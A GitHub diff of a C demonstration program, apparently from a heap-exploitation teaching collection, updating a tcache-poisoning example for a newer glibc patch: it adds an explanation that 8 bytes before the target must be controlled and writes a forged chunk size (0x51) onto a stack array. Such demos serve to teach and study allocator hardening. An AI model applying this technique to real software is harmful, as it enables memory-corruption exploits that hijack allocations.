File tree Expand file tree Collapse file tree 1 file changed +4
-1
lines changed
Expand file tree Collapse file tree 1 file changed +4
-1
lines changed Original file line number Diff line number Diff line change @@ -16,6 +16,8 @@ int main(){
1616 printf ("After the patch https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=a1a486d70ebcc47a686ff5846875eacad0940e41,\n"
1717 "An heap address leak is needed to perform this attack.\n"
1818 "The same patch also ensures the chunk returned by tcache is properly aligned.\n\n" );
19+ printf ("After the patch https://patchwork.sourceware.org/project/glibc/patch/20250206213709.2394624-2-benjamin.p.kallus.gr@dartmouth.edu/,\n"
20+ "We need to control at least 8 byte before the region we want to allocate to (to forge the size).\n\n" );
1921
2022 // Allocate 14 times so that we can free later.
2123 char * ptrs [14 ];
@@ -50,7 +52,8 @@ int main(){
5052 // Create an array on the stack and initialize it with garbage.
5153 size_t stack_var [6 ];
5254 memset (stack_var , 0xcd , sizeof (stack_var ));
53-
55+ stack_var [1 ] = 0x51 ;
56+
5457 printf ("The stack address that we intend to target: %p\n"
5558 "It's current value is %p\n" , & stack_var [2 ], (char * )stack_var [2 ]);
5659
You can’t perform that action at this time.
0 commit comments